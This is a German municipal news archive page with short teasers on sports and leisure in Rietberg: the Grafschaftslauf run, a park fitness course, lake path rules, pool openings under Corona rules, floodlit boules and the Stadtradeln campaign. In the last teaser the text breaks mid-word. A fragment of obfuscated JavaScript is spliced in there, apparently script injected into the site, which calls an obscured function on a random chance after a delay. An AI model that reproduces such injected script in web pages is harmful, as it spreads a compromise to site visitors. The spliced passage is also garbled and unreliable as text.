Category Archives: Sport Rietberg

Buntes Rahmenprogramm zum Grafschaftslauf

Am kommenden Sonntag, 29. August, steigt der Grafschaftslauf, das große Lauf-Ereignis von Rietberg über Verl-Kaunitz nach Schloss Holte-Stukenbrock. Um die Läufer entsprechend zu unterstützen, richtet die Stadtmarketing Rietberg GmbH ein Fan-Nest ein, eine kleine Zone, in der ein buntes Rahmenprogramm für Stimmung sorgen soll. Dort sind alle Besucher willkommen, die die vorbeilaufenden Sportler anfeuern möchten.

Neuer Fitnessparcours im Gartenschaupark

Die Corona-Pandemie hat an manchen Stellen auch für Erfindungsreichtum gesorgt und neue Projekte hervorgebracht. Von einem solchen neuen Projekt des TuS Westfalia Neuenkirchen profitiert der Gartenschaupark Rietberg: Im Parkteil Nord gibt es jetzt einen Fitnessparcours für Groß und Klein.   Dabei müssen die Besucher noch nicht einmal in Sportkleidung erscheinen oder besonders geschult sein, wenn

Rund um den See auf dem rechten Weg bleiben

In den vergangenen 20 Jahren hat sich der Mastholter See zu einem Freizeit- und Naherholungsgebiet für die gesamte Stadt Rietberg und als beliebtes Ausflugsziel etabliert. Vor dem Hintergrund der wachsenden Zahl an Spaziergängern und Radfahrern auf dem Rundweg um die rund 25 Hektar große Wasserfläche müssen allerdings einige Spielregeln beachtet werden. Die haben Eigentümer, die

Grafschaftslauf: Strecke ist jetzt für Läufer, Wanderer und Radler ausgeschildert

Im vergangenen Jahr musste die Premiere coronabedingt ausfallen, doch diesmal soll es klappen: Am Sonntag, 29. August, können Läuferinnen und Läufer aus nah und fern erstmals beim Grafschaftslauf an den Start gehen. Die 28,86 Kilometer lange Strecke führt durch die drei Städte Rietberg, Verl und Schloß Holte-Stukenbrock, die einst alle zur Grafschaft Rietberg gehörten. Wer

Freibad öffnet am 30. Mai nur für Schwimmer

Die kreisweite 7-Tages-Inzidenz liegt unter 100. Das bedeutet freie Bahn für die Öffnung des Rietberger Freibads. Ab Sonntag, 30. Mai, sind Schwimmer willkommen. Die Liegewiese, das Kinderplanschbecken, die Rutsche und der Sand-Matsch-Bereich öffnen allerdings noch nicht. Öffnungszeiten sind montags bis freitags von 6 bis 20 Uhr, samstags von 7 bis 19 Uhr und sonntags von

Dauerkartenverkauf für Freibadsaison startet

Wann das Rietberger Freibad diesen Sommer öffnet, steht noch nicht genau fest. Das Land Nordrhein-Westfalen hat in seiner am Freitag veröffentlichten Coronaschutzverordnung aber zumindest die Rahmenbedingungen festgelegt. Ab einer stabilen kreisweiten 7-Tages-Inzidenz von unter 100 darf die Stadt das Freibad zum Zwecke der Sportausübung betreiben. Ab einer Inzidenz von unter 50 dürfen auch die Liegewiese,

Boulespielen unter Flutlicht

Dunkelheit macht den Boule-Spielern des TuS Viktoria Rietberg und des TuS Westfalia Neuenkirchen ab sofort nichts mehr aus. Denn zwei ihrer Boule-Bahnen im Gartenschaupark Rietberg verfügen neuerdings über Flutlicht, so dass die Kugeln auch zu späterer Stunde noch zielsicher geworfen werden können.  Parkmeister Helmut Kammermann und seine Mitarbeiter Bodo Schiffmann und Markus Zurwiehe haben dafür

Stadtradeln: Teilnehmer ersparen Umwelt 11 Tonnen CO2

Die große Abschlussfeier mit Siegerehrung zum »Stadtradeln« musste coronabedingt ausfallen. Die Gewinner und Gewinnerinnen wurden stattdessen persönlich informiert und können ihre Preise nun bei der Stadtverwaltung abholen. Drei Wochen lang sollten im September möglichst viele Rietberger auf das Auto verzichten und möglichst viele Kilometer mit dem Rad zurücklegen. So sind 76.573 Kilometer zusammengekommen. Insgesamt hatten

Gute (Wetter-)Aussichten: Freibad öffnet länger

Der Sommer geht kommende Woche in die Verlängerung und die Stadt Rietberg geht mit. Das Freibad am Torfweg schließt nicht (wie angekündigt) am Sonntag, 13. September, sondern erst am Donnerstag, 17. September. Bis einschließlich Mittwoch können Schwimmer ihre Bahnen also unter freiem Himmel ziehen. Das Hallenbad öffnet dann am Donnerstag, 17. September, wieder für Frühschwimmer.

Gemeinsam aufs Rad für ein besseres Klima

Am Montag, 7. September, beginnt in Rietberg erneut das Stadtradeln. In dem dreiwöchigen Aktions-Zeitraum sollen möglichst viele Rietbergerinnen und Rietberger ihr Auto stehen lassen, aufs Rad steigen und ihre Kilometer zählen. Am Ende der Aktion gibt es allerhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Gutscheine und Sachpreise zu gewinnen. Im vergangenen Jahr hatten